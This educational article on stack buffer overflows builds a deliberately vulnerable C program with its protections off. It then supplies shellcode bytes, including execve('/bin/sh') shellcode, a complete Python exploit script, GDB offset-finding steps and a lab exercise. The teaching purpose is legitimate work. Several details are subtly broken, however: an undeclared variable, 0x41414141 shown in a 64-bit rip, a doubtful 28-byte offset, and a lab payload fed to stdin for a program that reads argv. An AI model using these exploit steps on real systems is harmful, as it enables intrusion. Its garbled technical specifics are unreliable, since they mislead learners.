Buffer overflow attacks are some of the oldest yet most fundamental security vulnerabilities. While modern operating systems have added protections (ASLR, stack canaries, DEP), understanding buffer overflows is essential for mastering low-level security concepts and binary exploitation.
This article explains the mechanics, walk through a simple vulnerable program, and show how attackers exploit it.
What Is a Buffer Overflow?
A buffer overflow occurs when a program writes more data to a buffer than it can hold, overwriting adjacent memory. This can corrupt data, crash the program, or execute arbitrary code.
Simple example:
#include <string.h>
int main() {
char buffer[10]; // 10-byte buffer
strcpy(buffer, input); // Copy user input
return 0;
}
If input is 20 bytes, strcpy writes 20 bytes into 10 bytes of space. The extra 10 bytes spill into adjacent memory.
What gets overwritten depends on memory layout.
Memory Layout (The Foundation)
Understanding where data lives in memory is crucial. A program’s memory is organized:
High Memory Addresses
↑
├─ [Stack] ← grows downward
│ ├─ Local variables
│ ├─ Function parameters
│ ├─ Return address ← CRITICAL: Where function returns to
│ └─ Saved frame pointer
│
├─ (unused space)
│
├─ [Heap] ← grows upward
│ └─ Dynamically allocated memory
│
├─ [BSS Segment]
│ └─ Uninitialized global/static variables
│
├─ [Data Segment]
│ └─ Initialized global/static variables
│
└─ [Code/Text]
└─ Program instructions
Low Memory Addresses
Critical insight: The return address is stored on the stack. If we overflow a buffer on the stack, we can overwrite the return address.
Stack-Based Buffer Overflow
This is the most common type. When a function returns, it reads the return address from the stack and jumps there. If we overwrite that address with our code’s address, we redirect execution.
Vulnerable Program Example
#include <stdio.h>
#include <string.h>
void vulnerable_function(char *input) {
char buffer[20];
strcpy(buffer, input); // VULNERABLE: No bounds checking
printf("You entered: %s\n", buffer);
}
int main(int argc, char *argv[]) {
if (argc < 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}
vulnerable_function(argv[1]);
printf("Program completed successfully\n");
return 0;
}
Save as vulnerable.c and compile (disable protections for learning):
gcc -fno-stack-protector -z execstack vulnerable.c -o vulnerable
# -fno-stack-protector: Disable stack canary
# -z execstack: Make stack executable
Normal Execution
./vulnerable "hello"
You entered: hello
Program completed successfully
Buffer Overflow - Crash
Input longer than 20 bytes causes crash:
./vulnerable "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
You entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
The extra ‘A’s overwrite the return address, pointing to invalid memory. Program crashes.
Finding the Offset
To exploit this, we need to know:
- Buffer size: 20 bytes
- Offset to return address: How many bytes before we reach the return address?
Use GDB (debugger) to find it:
gdb ./vulnerable
(gdb) run $(python3 -c "print('A'*30)")
Program crashes. Get a core dump:
(gdb) bt
#0 0x41414141 in ?? ()
#1 0x00007fff... in ?? ()
The 0x41414141 (hex for ‘AAAA’) shows the return address is overwritten with ‘A’s.
Determining exact offset:
Create a pattern that’s easier to locate:
python3 -c "import string; import itertools; \
s = ''.join(''.join(p) for p in itertools.product(string.ascii_lowercase, repeat=2)); \
print(s[:50])"
# Output: aabacadaeafagahaiajakaalamanapaqarasatauavawaxayaz...
Run with pattern:
(gdb) run $(python3 -c "import string; import itertools; \
s = ''.join(''.join(p) for p in itertools.product(string.ascii_lowercase, repeat=2)); \
print(s[:100])")
Check registers:
(gdb) info registers rsp rip
rip 0x61706b61 0x61706b61
The value 0x61706b61 is part of our pattern. Count where it appears.
Simpler approach: Use trial and error.
- 24 bytes: Crash with offset near answer
- 28 bytes: Return address overwritten
- 32 bytes: Confirmed offset
Through testing, offset = 28 bytes.
Crafting the Exploit
Now that we know the offset, we can control the return address.
python3 << 'EOF'
# 28 bytes of padding + 8 bytes for return address (64-bit)
offset = 28
return_address = 0x0000555555554999 # Address of injected code
payload = b'A' * offset + return_address.to_bytes(8, 'little')
print(payload)
EOF
But where does the return address point?
Without ASLR and DEP, the shellcode can go on the stack itself.
Shellcode
Shellcode is machine code that executes a shell or other commands. For x86-64 Linux:
; Minimal exit shellcode (0 bytes exit code)
mov rax, 60 ; syscall number for exit
xor edi, edi ; exit code = 0
syscall
; In hex: 48c7c03c000000 (mov) + 4831ff (xor) + 0f05 (syscall)
; Total: \x48\xc7\xc0\x3c\x00\x00\x00\x48\x31\xff\x0f\x05
More useful: execve syscall (spawn /bin/sh):
; execve("/bin/sh", NULL, NULL) syscall
mov rax, 59 ; execve syscall
lea rdi, [rel binsh] ; /bin/sh string
xor rsi, rsi ; argv = NULL
xor rdx, rdx ; envp = NULL
syscall
; Precomputed: \x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\x0e\x00\x00\x00...
Finding Protections
Before exploiting, check what protections are enabled:
checksec --file=vulnerable
Arch: amd64-64-bit
RELRO: Partial
Stack: No canary found
NX: NX disabled
PIE: No
RWX: Has RWX segments
- Stack: No canary: Good! Stack overflow not detected.
- NX: NX disabled: Good! Stack is executable.
- PIE: No: Good! Addresses are predictable.
In a real program with modern protections, exploitation is much harder.
Complete Exploit Example
Given the vulnerable program and our analysis:
#!/usr/bin/env python3
import subprocess
import sys
offset = 28 # Bytes to return address
shell_addr = 0x7ffffffde000 + 1000 # Approximate stack address (without ASLR)
# Simple shellcode to exit (demo)
shellcode = b'\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31\xff\x0f\x05'
# Padding + shellcode + padding to offset + return address pointing to shellcode
payload = shellcode + b'A' * (offset - len(shellcode)) + shell_addr.to_bytes(8, 'little')
# Run vulnerable program with payload
result = subprocess.run(['./vulnerable', payload], capture_output=True)
print(result.stdout.decode())
print(result.stderr.decode())
If successful, the program might crash cleanly (due to our exit syscall) or launch a shell.
Modern Protections (Why This Doesn’t Work in Real Programs)
1. Stack Canary
A random value placed before the return address. If overwritten, program terminates:
// Compiled with -fstack-protector (default in modern systems)
void function() {
char buffer[20];
// Compiler adds: uint64_t canary = __stack_chk_guard;
strcpy(buffer, input);
// Compiler adds: if (canary != __stack_chk_guard) abort();
}
Overflow the buffer, and the canary check fails before return.
2. Address Space Layout Randomization (ASLR)
Stack, heap, and code addresses randomize on each run:
for i in {1..5}; do
gdb -batch -ex 'run' -ex 'info proc mappings' ./vulnerable 2>/dev/null | grep stack | head -1
done
# Different addresses each run
Without knowing the exact stack address, returning to shellcode is impossible.
3. Data Execution Prevention (DEP/NX)
Stack is non-executable. Shellcode on the stack won’t run:
checksec --file=vulnerable
NX: NX enabled # Stack not executable
Shellcode must be in code segment (via ROP gadgets).
Why Learn Buffer Overflows?
- Understand memory: Low-level security concepts
- CTF competitions: Buffer overflows appear regularly
- Legacy systems: Older code lacks protections
- Reverse engineering: Recognize overflow patterns
- Defense: Know what NOT to do in code
Practical Lab Exercise
Setup a vulnerable program:
# Create vulnerable.c (code above)
gcc -fno-stack-protector -z execstack vulnerable.c -o vulnerable
# Use GDB to find offset
gdb ./vulnerable
(gdb) run $(python3 -c "print('A'*100)")
# Crashes; examine rip register
# Craft payload
python3 -c "print('A'*28 + '\xff\xff\xff\x7f\xff\xff\xff\x7f', end='')" | ./vulnerable
# Program crashes with controlled address
Next level (ROP):
With modern protections, use Return-Oriented Programming (ROP):
- Chain small code snippets (gadgets) to build new functionality
- Tools: ropper, ropgadget
Conclusion
Buffer overflows are memory corruption vulnerabilities where attackers write beyond allocated buffers and overwrite critical data (return addresses, function pointers, etc.). While modern OSes have mitigated the simplest exploits, understanding buffer overflows is fundamental to binary security.
Every CTF includes at least one overflow challenge. Learn to:
- Identify vulnerable code patterns (strcpy, sprintf, gets)
- Map memory layout
- Calculate offsets
- Understand protection mechanisms
- Bypass or work around protections
Master buffer overflows, and you’ll understand systems security at its core.